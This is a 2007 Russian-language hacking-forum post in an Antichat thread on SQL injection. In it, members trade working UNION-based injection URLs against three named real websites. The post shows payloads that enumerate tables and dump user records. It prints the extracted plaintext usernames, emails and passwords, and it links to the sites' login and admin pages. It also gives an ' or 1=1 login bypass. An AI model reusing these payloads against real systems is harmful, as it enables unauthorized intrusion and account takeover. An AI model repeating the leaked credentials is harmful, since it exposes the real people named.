ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

sql
  #11  
Старый 01.07.2007, 20:01
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Lightbulb sql
2злюка
Цитата:
Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/

эх найти бы таблицу юзеров
tbl_user
Цитата:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,count(1),4,5+from+tbl_user/*
95167 записей
Цитата:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5+from+tbl_user+limit+0,1/*
admin:highstreet4013

админка
Цитата:
http://www.sportsguns.co.uk/login.php
-----------------------------------------------------------------

NOmeR1
Цитата:
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..
вот-с
Цитата:
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,name,email,passw d),3,4,5,6,7,8,9,10,11,12,13,14+from+users+limit+0 ,1/*
ROBERT JONASSON:BMF_RIPPER@HOTMAIL.COM:4TWCPP
можно залогиниться тут - http://www.arcteryx.nu/butiken/login.php - но хз что с этим делать, я по голандски не умею, надо Хиддинка спросить)

------------------------------------------------------------------------

iv.
Цитата:
Подбираем кол-во колонок: Цитата:http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/* Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
можно нормально вывести здесь
Цитата:
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,table_name+from+informa tion_schema.tables+limit+35,1/*
есть табличка members
Цитата:
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,concat_ws(0x3a,login,pa ssword,email)+from+members+limit+0,1/*
Borisov:3788:s_nahim@inbox.ru
еще примечательно, что можно авторизироваться просто введя ' or 1=1/* вместо логина плюс произвольный пароль

-----------------------------------------------------------------------
[PS] что-то везде пароли хранятся в открытом виде
Последний раз редактировалось Серенький; 01.07.2007 в 20:49..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ